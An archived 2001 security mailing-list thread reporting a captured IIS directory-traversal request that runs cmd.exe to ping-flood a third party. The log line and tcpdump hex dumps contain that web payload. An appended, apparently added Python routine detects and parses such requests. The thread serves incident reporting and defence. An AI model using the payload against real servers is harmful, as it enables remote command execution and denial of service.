Security Incidents mailing list archives

Re: NEW DEVELOPMENT -- Attempts at using CodeRed II systems to perform Denial of Service Attacks and Possible Attacking Tool


From: Blake Frantz <blake () mc net>
Date: Tue, 7 Aug 2001 18:32:54 -0500 (CDT)


This attack appears to be more related to MS01-026 than Code Red.

-Blake

On Tue, 7 Aug 2001, Eyes to the Skies. wrote:

Okay this is scary.

This looks like an attempt to use a CodeRed II infected system to
perform a denial of service attack. I don't think I need to stress the
severity of this.

==> /var/log/apache/access_log <==
[deleted host] - - [07/Aug/2001:17:19:35 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ping.exe+"-v"+igmp+"-t"+"-l"+65000+[deleted target ip]+"-n"+7000+"-w"+0" 404 -

TCPDUMP: (I have only removed the source, since editing out the target
IP would bork the dump...)

17:19:34.539092 xxx.xxx.xxx.3385 > tnt1a-31.flint.corecomm.net.www: P [bad tcp cksum 6ca7!] 792933628:792933745(117) ack 3456715952 win 16616 (DF) (ttl 110, id 7881, len 157)
0x0000   4500 009d 1ec9 4000 6e06 f3dd d519 f9a4        E.....@.n.......
0x0010   d8d6 521f 0d39 0050 2f43 34fc ce09 4cb0        ..R..9.P/C4...L.
0x0020   5018 40e8 4446 0000 4745 5420 2f73 6372        P.@.DF..GET./scr
0x0030   6970 7473 2f2e 2e0c 2e2f 7769 6e6e 742f        ipts/..../winnt/
0x0040   7379 7374 656d 3332 2f63 6d64 2e65 7865        system32/cmd.exe
0x0050   3f2f 632b 7069 6e67 2e65 7865 2b22 2d76        ?/c+ping.exe+"-v
0x0060   222b 6967 6d70 2b22 2d74 222b 222d 6c22        "+igmp+"-t"+"-l"
0x0070   2b36 3530 3030 2b32 3133 2e32 352e 3933        +65000+213.25.93
0x0080   2e31 3230 2b22 2d6e 222b 3730 3030 2b22        .120+"-n"+7000+"
0x0090   2d77 222b 300d 0a0d 0a2b 300d 0a               -w"+0....+0..
17:19:34.539626 unknown ip 0
0x0000   0000 0000 4510 009d 0000 0000 ff06 c196        ....E...........
0x0010   d519 f9a4 d8d6 521f 0d39 0050 fc34 432f        ......R..9.P.4C/
0x0020   fc34 432f 5018 0860 7cff 0000 4745 5420        .4C/P..`|...GET.
0x0030   2f73 6372 6970 7473 2f2e 2e0c 2e2f 7769        /scripts/..../wi
0x0040   6e6e 742f 7379 7374 656d 3332 2f63 6d64        nnt/system32/cmd
0x0050   2e65 7865 3f2f 632b 7069 6e67 2e65 7865        .exe?/c+ping.exe
0x0060   2b22 2d76 222b 6967 6d70 2b22 2d74 222b        +"-v"+igmp+"-t"+
0x0070   222d 6c22 2b36 3530 3030 2b32 3133 2e32        "-l"+65000+213.2
0x0080   352e 3933 2e31 3230 2b22 2d6e 222b 3730        5.93.120+"-n"+70
0x0090   3030 2b22 2d77 222b 300d 0a0d 0a2b 300d        00+"-w"+0....+0.
0x00a0   0a                                             .

17:20:13.919075 xxx.xxx.xxx.xxx.4229 > tnt1a-31.flint.corecomm.net.www: P [bad tcp cksum 6ca7!] 841644777:841644894(117) ack 3492756124 win 16616 (DF) (ttl 110, id 11022, len 157)
0x0000   4500 009d 2b0e 4000 6e06 e798 d519 f9a4        E...+.@.n.......
0x0010   d8d6 521f 1085 0050 322a 7ae9 d02f 3a9c        ..R....P2*z../:.
0x0020   5018 40e8 0814 0000 4745 5420 2f73 6372        P.@.....GET./scr
0x0030   6970 7473 2f2e 2e0c 2e2f 7769 6e6e 742f        ipts/..../winnt/
0x0040   7379 7374 656d 3332 2f63 6d64 2e65 7865        system32/cmd.exe
0x0050   3f2f 632b 7069 6e67 2e65 7865 2b22 2d76        ?/c+ping.exe+"-v
0x0060   222b 6967 6d70 2b22 2d74 222b 222d 6c22        "+igmp+"-t"+"-l"
0x0070   2b36 3530 3030 2b32 3133 2e32 352e 3933        +65000+213.25.93
0x0080   2e31 3230 2b22 2d6e 222b 3730 3030 2b22        .120+"-n"+7000+"
0x0090   2d77 222b 300d 0a0d 0a2b 300d 0a               -w"+0....+0..

17:20:13.919639 unknown ip 0
0x0000   0000 0000 4510 009d 0000 0000 ff06 0000        ....E...........
0x0010   d519 f9a4 d8d6 521f 1085 0050 e97a 2a32        ......R....P.z*2
0x0020   e97a 2a32 5018 0860 5422 0000 4745 5420        .z*2P..`T"..GET.
0x0030   2f73 6372 6970 7473 2f2e 2e0c 2e2f 7769        /scripts/..../wi
0x0040   6e6e 742f 7379 7374 656d 3332 2f63 6d64        nnt/system32/cmd
0x0050   2e65 7865 3f2f 632b 7069 6e67 2e65 7865        .exe?/c+ping.exe
0x0060   2b22 2d76 222b 6967 6d70 2b22 2d74 222b        +"-v"+igmp+"-t"+
0x0070   222d 6c22 2b36 3530 3030 2b32 3133 2e32        "-l"+65000+213.2
0x0080   352e 3933 2e31 3230 2b22 2d6e 222b 3730        5.93.120+"-n"+70
0x0090   3030 2b22 2d77 222b 300d 0a0d 0a2b 300d        00+"-w"+0....+0.
0x00a0   0a                                             .


As an afterthought, I saw a URL drifting around, related to such an
idea: http://www.iispacket.com/ , although I am not getting that host to
respond.

I think this needs immediate attention. I can't do it now, I must go to
school.
-- 

 http://c64.arcsnet.net/
 ICQ UIN 1551505
 "The things you own, they end up owning you." - Tyler Durden

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
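Blake's point that this request is an IIS decoding issue rather than Code Red suggests a simple log check. Below is an added example, written for this archive page and not code from either poster: a Python triage routine that percent-decodes the request while accepting the overlong UTF-8 forms a strict decoder rejects (%c1%9c is an overlong encoding of the backslash, 0x5C), flags the traversal-to-cmd.exe pattern, and pulls the ping arguments out of the query so the host named in it can be notified. The log line is a constructed copy of the one reported above with placeholder addresses.

```python
import re
from urllib.parse import unquote_to_bytes

SAMPLE_LOG = (  # constructed: 10.0.0.5 and 198.51.100.7 are placeholders
    '10.0.0.5 - - [07/Aug/2001:17:19:35 -0400] "GET '
    '/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ping.exe+"-v"+igmp+"-t"'
    '+"-l"+65000+198.51.100.7+"-n"+7000+"-w"+0" 404 -'
)
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(.*)" (\d{3}) \S+$')
IPV4_RE = re.compile(r'^(?:\d{1,3}\.){3}\d{1,3}$')

def lenient_decode(path):
    """Percent-decode (twice, for %25 double encoding); accept overlong UTF-8 like %c1%9c -> '\\'."""
    data = unquote_to_bytes(path)
    if b'%' in data:
        data = unquote_to_bytes(data)
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))  # C1 9C -> 5C
            i += 2
        else:
            out.append(chr(b) if b < 0x80 else '\ufffd')
            i += 1
    return ''.join(out).replace('\\', '/')  # canonicalise separators

def triage(line):
    """Return a finding dict for a traversal/cmd.exe request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, stamp, request, status = m.groups()
    target = request.partition(' ')[2].split(' HTTP/')[0]  # HTTP/0.9: no version
    path, _, query = target.partition('?')
    decoded = lenient_decode(path)
    traversal = bool(re.search(r'(?:^|/)\.\./', decoded))
    cmd_exe = decoded.lower().endswith('/cmd.exe')
    if not (traversal or cmd_exe):
        return None
    args = [a.strip('"') for a in query.split('+') if a]  # IIS: '+' separates args
    finding = {'client': client, 'time': stamp, 'status': status, 'traversal': traversal,
               'cmd_exe': cmd_exe, 'continuous': '-t' in args,
               'program': next((a for a in args if a.lower().endswith('.exe')), None),
               'dos_target': next((a for a in args if IPV4_RE.match(a)), None)}
    for flag, key in (('-l', 'payload_bytes'), ('-n', 'count')):
        if flag in args and args.index(flag) + 1 < len(args):
            finding[key] = int(args[args.index(flag) + 1])
    return finding
```

A 404 from Apache, as in the report, means the request failed on this host, but the address in `dos_target` still identifies who the sender was trying to flood.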
